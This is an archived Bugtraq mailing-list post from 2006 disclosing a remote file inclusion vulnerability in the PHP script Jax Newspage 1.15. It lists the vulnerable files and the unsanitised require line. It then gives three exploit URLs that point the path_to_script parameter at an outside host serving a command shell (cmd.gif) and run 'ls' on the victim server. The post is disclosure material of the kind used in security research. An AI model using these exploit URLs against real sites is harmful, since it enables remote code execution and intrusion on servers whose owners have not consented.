lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 13 Oct 2006 01:00:51 -0000 From: dj_remix_20@...mail.com To: bugtraq@...urityfocus.com Subject: Jax Newspage Remote File include # BiyoSecurity.Org & SecurityWall.Org # Download : http://www.jtr.de/scripting/php/newspage/newspage%20v1.15.zip # Script Name : jax newspage # Version : 1.15 # Risk : high # Regard : RMx # Thanx : Liz0zim , KorsaN , DreamLord , TR_IP # Vulnerable Files : /admin/index.php /admin/news.admin.php /newsarchive.php # Vulnerable code : // Global variables require ( $path_to_script."globals.inc.php"); # Exploit : http://www.victim.com/[PATH]/newsarchive.php?path_to_script=http://site.com/cmd.gif?&cmd=ls http://www.victim.com/[PATH]/admin/index.php?path_to_script=http://site.com/cmd.gif?&cmd=ls http://www.victim.com/[PATH]/admin/news.admin.php?path_to_script=http://site.com/cmd.gif?&cmd=ls